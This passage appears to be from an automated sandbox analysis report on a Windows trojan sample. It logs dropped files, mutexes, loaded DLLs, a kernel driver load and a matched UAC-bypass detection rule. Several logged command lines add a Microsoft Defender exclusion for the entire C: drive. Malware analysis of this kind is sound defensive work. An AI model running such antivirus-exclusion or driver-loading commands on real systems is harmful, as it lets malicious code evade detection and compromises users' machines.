                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: 18_2_00000001400077A818_2_00000001400077A8
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: 18_2_00000001400638E418_2_00000001400638E4
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: 18_2_000000014001390218_2_0000000140013902
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: 18_2_000000014001292418_2_0000000140012924
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: 18_2_000000014004794C18_2_000000014004794C
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: 18_2_000000014005498018_2_0000000140054980
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: 18_2_000000014002F99818_2_000000014002F998
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: 18_2_0000000140054AF818_2_0000000140054AF8
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: 18_2_0000000140021C5818_2_0000000140021C58
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: 18_2_0000000140054C5418_2_0000000140054C54
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: 18_2_000000014002EEC818_2_000000014002EEC8
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: 18_2_0000000140047EE818_2_0000000140047EE8
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: 18_2_0000000140048F1018_2_0000000140048F10
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: 18_2_000000014006FFE018_2_000000014006FFE0
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: 18_2_0000000140061FDC18_2_0000000140061FDC
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FF88B060EF219_2_00007FF88B060EF2
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe 4F0B2C61BCCFD9AA3DB301EE4E15607DF41DED533757DE34C986A0FF25B6246D
                    Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\K47ZW3T_7928.sys C37BF1ABC0662B4F18607E2D7B75F5C600E45EA5604DAFFA54674E2AEBDCE9F0
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeProcess token adjusted: Load DriverJump to behavior
                    Source: C:\Windows\System32\svchost.exeCode function: String function: 000002684C4984A8 appears 48 times
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: String function: 007EB600 appears 69 times
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeCode function: String function: 0000000140011D54 appears 62 times
                    Source: UZPt0hR.exe, 00000000.00000000.1201052726.0000000000680000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameunregmp2.exej% vs UZPt0hR.exe
                    Source: UZPt0hR.exeBinary or memory string: OriginalFilenameunregmp2.exej% vs UZPt0hR.exe
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeDriver loaded: \Registry\Machine\System\CurrentControlSet\Services\XuH4Y8_7928Jump to behavior
                    Source: UZPt0hR.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 5.2.svchost.exe.2684c470000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.UZPt0hR.exe.95bfd8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.UZPt0hR.exe.95bfd8.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.UZPt0hR.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: UZPt0hR.exeStatic PE information: Section: c2 ZLIB complexity 0.9931057837701613
                    Source: K47ZW3T_7928.sys.15.drBinary string: \Device\Udp6\Device\Udp\Device\Tcp6\Device\Tcp
                    Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@22/19@2/6
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_007D5D7C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,RegOpenKeyA,wsprintfA,RegCreateKeyA,RegSetValueExA,RegSetValueExA,RegSetValueExA,wsprintfA,RegSetValueExA,MultiByteToWideChar,wsprintfW,NtLoadDriver,RegCloseKey,RegCloseKey,15_2_007D5D7C
                    Source: C:\Users\user\Desktop\UZPt0hR.exeCode function: 0_2_004043D0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,0_2_004043D0
                    Source: C:\Users\user\Desktop\UZPt0hR.exeCode function: 0_2_0041DE90 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0041DE90
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\UZPt0hR.exeMutant created: \Sessions\1\BaseNamedObjects\{3FA0BA37-09C6-4551-AE7D-90F1279DF03F}
                    Source: C:\Users\user\Desktop\UZPt0hR.exeMutant created: \Sessions\1\BaseNamedObjects\{332F5D59-2BCB-4D58-B258-019647CFE541}
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_03
                    Source: C:\Users\user\Desktop\UZPt0hR.exeMutant created: \Sessions\1\BaseNamedObjects\{3309A6B4-2F09-4BC8-A971-5D5A3B1B34EE}
                    Source: C:\Users\user\Desktop\UZPt0hR.exeMutant created: \Sessions\1\BaseNamedObjects\{BECD724E-BB45-47CB-82D8-31731BA1EB16}
                    Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\{213CD3BF-7EA5-4F3F-A371-F1D075B5EB25}
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6884:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
                    Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" """
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\UZPt0hR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: UZPt0hR.exeVirustotal: Detection: 57%
                    Source: C:\Users\user\Desktop\UZPt0hR.exeFile read: C:\Users\user\Desktop\UZPt0hR.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\UZPt0hR.exe "C:\Users\user\Desktop\UZPt0hR.exe"
                    Source: C:\Users\user\Desktop\UZPt0hR.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\UZPt0hR.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:'
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" """
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe "C:\Users\user\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Remove-MpPreference -ExclusionPath C:\
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\UZPt0hR.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                    Source: C:\Users\user\Desktop\UZPt0hR.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" """Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe "C:\Users\user\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""Jump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Remove-MpPreference -ExclusionPath C:\Jump to behavior
                    Source: C:\Users\user\Desktop\UZPt0hR.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\UZPt0hR.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\UZPt0hR.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\UZPt0hR.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\UZPt0hR.exeSection loaded: msi.dllJump to behavior
                    Source: C:\Users\user\Desktop\UZPt0hR.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\UZPt0hR.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\UZPt0hR.exeSection loaded: dbgcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\UZPt0hR.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\UZPt0hR.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\UZPt0hR.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\UZPt0hR.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\UZPt0hR.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\UZPt0hR.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dlnashext.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wpdshext.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
